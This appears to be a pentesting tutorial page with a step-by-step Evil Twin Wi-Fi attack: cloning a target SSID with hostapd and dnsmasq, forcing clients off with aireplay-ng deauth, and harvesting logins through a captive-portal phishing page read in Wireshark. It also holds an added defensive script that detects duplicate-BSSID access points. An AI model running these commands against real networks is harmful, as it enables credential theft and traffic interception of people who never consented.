Evil-Twin Attack

Last updated 1 year ago

This is for educational purposes and only to be performed on networks you have permission to do so.

Basic info on Wireless can be found here. This will be a walk-through on performing an Evil Twin wireless attack and setting up Captive Portals.

An evil twin is a fake wireless access point (AP) that looks like a real one. The concept is to set up a malicious wireless network with the same SSID name as the target.

A WiFi adapter that supports monitor mode and packet injection is not required for the evil twin itself. It is required, though, if we want to kick clients off their network so they connect to ours.
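From the defender's side, the footprint of the setup described on this page is one ESSID suddenly beaconed by a second BSSID. The following is an added example, not code from the original page: a Python script that parses an airodump-ng-style CSV AP table (sample constructed inline) and flags ESSIDs advertised by more than one BSSID, or by a BSSID outside an allow-list of known APs.

```python
import csv
from collections import defaultdict
from io import StringIO

# Constructed sample (not a real capture) in the AP-table layout that
# airodump-ng writes with "-w prefix --output-format csv": the genuine
# "Open-WiFi" AP plus a second BSSID beaconing the same ESSID.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 54, OPN, , , -40, 120, 0, 0.0.0.0, 9, Open-WiFi,
66:77:88:99:AA:BB, 2024-01-01 10:03:00, 2024-01-01 10:05:00, 6, 54, OPN, , , -35, 60, 0, 0.0.0.0, 9, Open-WiFi,
CC:DD:EE:FF:00:11, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 1, 54, WPA2, CCMP, PSK, -60, 100, 0, 0.0.0.0, 7, HomeNet,
"""

def parse_aps(text):
    """Parse the AP table up to the first blank line (airodump-ng appends a
    station table after it) into dicts holding the fields we need."""
    aps = []
    reader = csv.reader(StringIO(text), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    for row in reader:
        if not row or not row[0].strip():
            break  # blank separator before the station table
        rec = dict(zip(header, (c.strip() for c in row)))
        aps.append({"bssid": rec["BSSID"].upper(), "channel": int(rec["channel"]),
                    "privacy": rec["Privacy"], "essid": rec["ESSID"]})
    return aps

def find_evil_twins(aps, known_bssids=()):
    """Return {essid: [suspect APs]}: an ESSID beaconed by more than one BSSID,
    or, when an allow-list of legitimate BSSIDs is given, by any BSSID outside
    it. Channel is deliberately ignored: the hostapd.conf below copies the
    target's channel, so it does not separate the twin from the real AP."""
    by_essid = defaultdict(list)
    for ap in aps:
        by_essid[ap["essid"]].append(ap)
    findings = {}
    for essid, entries in by_essid.items():
        if known_bssids:
            suspects = [e for e in entries if e["bssid"] not in known_bssids]
        else:
            suspects = entries if len(entries) > 1 else []
        if suspects:
            findings[essid] = suspects
    return findings

if __name__ == "__main__":
    for essid, suspects in find_evil_twins(parse_aps(SAMPLE_CSV)).items():
        print(f"[!] {essid!r} beaconed by {len(suspects)} BSSIDs: "
              + ", ".join(f"{s['bssid']} ({s['privacy']}, ch{s['channel']})" for s in suspects))
```

Because the twin on this page is an open AP, a Privacy mismatch (OPN beside WPA2 for the same ESSID) is a second signal worth checking when the real network is encrypted.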

Hardware

I myself have and recommend these adapters:

  • Alfa AWUS036ACM <-- Capable of 2.4GHz and 5GHz

  • Alfa AWUS036ACHM <-- Capable of 2.4GHz and 5GHz

  • Alfa AWUS036ACH <-- Capable of 2.4GHz and 5GHz (This more than likely *will* require driver installation)

  • Panda Wireless PAU09 N600 <-- Capable of 2.4GHz and 5GHz

First we install the prerequisites:

sudo apt install -y dnsmasq hostapd aircrack-ng

Finding target

First we find our target. I will target "Open-WiFi" in this example; we use airodump-ng for this:

sudo airodump-ng (interface)

Kill processes that may interfere:

sudo airmon-ng check kill

Now put the interface into monitor mode if we're going to deauthenticate a client:

sudo airmon-ng start (interface)

Setup AP

Create a dnsmasq.conf file:

# Set the wifi interface
interface=(interface)

# Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

# Set the gateway IP address
dhcp-option=3,10.0.0.1

# Set DNS server address
dhcp-option=6,10.0.0.1

# Set Server
server=8.8.8.8

# logs
log-queries
log-dhcp

# Redirect all requests to 10.0.0.1
#address=/#/10.0.0.1

# Redirect google to 10.0.0.1
#address=/google.com/10.0.0.1
#address=/www.google.com/10.0.0.1
#address=/google.com/www.google.com/10.0.0.1

Note that the address= lines are commented out; uncomment the ones you want. If we uncomment #address=/#/10.0.0.1, clients will connect but get no internet access, because the pound sign (#) is a wildcard in dnsmasq that matches every domain. So they connect to the AP and are immediately asked to sign in on the Evil Portal we set up.

Instead, we can redirect only specific websites back to our Evil Portal.

Create hostapd.conf and fill in the target info:

interface=(interface)
driver=nl80211
ssid=(Target AP)
hw_mode=g
channel=(Target channel)
macaddr_acl=0
ignore_broadcast_ssid=0

Assign the interface the gateway IP and netmask:

sudo ifconfig (interface) up 10.0.0.1 netmask 255.255.255.0

Add the route:

sudo route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

Set up a small script for the iptables rules:

#!/bin/bash
# Flush existing rules, then NAT traffic leaving via the internet-facing interface
sudo iptables --flush
sudo iptables --table nat --flush
sudo iptables --table nat --append POSTROUTING --out-interface (internet interface) -j MASQUERADE
# Allow forwarding from the fake AP's wireless interface
sudo iptables --append FORWARD --in-interface (wireless interface) -j ACCEPT
# Enable IPv4 forwarding ("sudo echo 1 > file" does not work: the redirect runs unprivileged)
sudo sysctl -w net.ipv4.ip_forward=1

I named mine IP-Tables.sh. Make it executable and run it:

chmod +x IP-Tables.sh
sudo ./IP-Tables.sh

If you want the AP set up without a captive portal, just run dnsmasq and hostapd.

Start dnsmasq with:

sudo dnsmasq -C (path/to/dnsmasq.conf)

Start hostapd with:

sudo hostapd (path/to/hostapd.conf)

We can run the command with -B at the end to push it to the background, though if we do this we don't see when a client connects:

sudo hostapd (path/to/hostapd.conf) -B

Captive Portals

Put your captive portal files in the /var/www/html/ directory.

Edit /etc/apache2/sites-enabled/000-default.conf and add the following to the end (this uses mod_rewrite, so the module must be enabled in Apache):

sudo nano /etc/apache2/sites-enabled/000-default.conf

<Directory "/var/www/html">
    RewriteEngine On
    RewriteBase /
    # Strip a leading www. from the host
    RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
    RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

    # Any path that is not a real file or directory is served by the portal index
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ / [L,QSA]
</Directory>

Start the web server:

sudo service apache2 start

Start dnsmasq with:

sudo dnsmasq -C (path/to/dnsmasq.conf)

Start hostapd AP with:

sudo hostapd (path/to/hostapd.conf)

We can run the command with -B at the end to push it to the background, though if we do this we don't see when a client connects:

sudo hostapd (path/to/hostapd.conf) -B

Once we're ready, we can disconnect clients from their network so they connect to ours, using aireplay-ng:

sudo aireplay-ng -0 0 -a (BSSID) (interface)

Or, if we want to deauth a specific client:

sudo aireplay-ng -0 0 -a (bssid) -c (Client MAC Address) (interface)

The -0 0 sends deauth packets continuously until stopped; we can change it to -0 10 to send just 10 deauth packets.

Post connection

As the user attempts to go to any page, they are taken to the login portal and asked to enter a username/password, which is captured.

In Wireshark, expand the HTTP POST request, then HTML Form URL Encoded, and we will see their credentials.

Wireshark filters for the relevant packets:

  • dns && ip.addr == (IP) to see the sites they are going to

  • frame contains "(word)" to search for a given string

  • http.request.method == "POST" to show us login info

You can also use a device such as the WiFi Pineapple. This primarily works on open networks.

Once they are connected, or even before, we can start intercepting traffic with whatever tools we want, like Wireshark, tshark, tcpdump, etc. In this case I'll use Wireshark on wlan0, the interface I was broadcasting from.
